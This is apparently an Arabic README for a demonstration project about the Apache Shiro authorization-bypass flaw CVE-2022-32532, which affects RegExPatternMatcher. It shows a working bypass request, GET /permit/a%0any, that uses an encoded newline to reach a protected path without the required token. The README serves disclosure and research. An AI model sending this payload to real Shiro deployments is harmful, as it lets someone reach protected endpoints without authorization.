
Apache Shiro CVE-2022-32532
هذا مشروع توضيحي، يعرض فقط أحد شروط استغلال هذه الثغرة (CVE-2022-32532).
في الواقع، هناك طرق أكثر لاستغلالها، طالما أن المطورين يستخدمون RegExPatternMatcher، فسيكون هناك ثغرة تجاوز محتملة.
يتطلب التحقق من رأس الطلب (Token) تحت التهيئة الحالية، وإلا فلن يكون لديك صلاحية الوصول إلى الواجهة تحت /permit
يمكن لهذا الطلب النجاح
GET /permit/any HTTP/1.1
Token: 4ra1n
لا يُسمح بالوصول في حالة عدم وجود رأس الطلب (Token)
GET /permit/any HTTP/1.1
يمكن تجاوزها بطريقة بسيطة في تكوينات خاصة ولكن شائعة
GET /permit/a%0any HTTP/1.1
https://lists.apache.org/thread/y8260dw8vbm99oq7zv6y3mzn5ovk90xh
هذه الثغرة مشابهة لـ Spring-Security CVE-2022-22978
شكرًا لـ bdemers (عضو في Apache Shiro PMC) و chybeta (باحث أمني)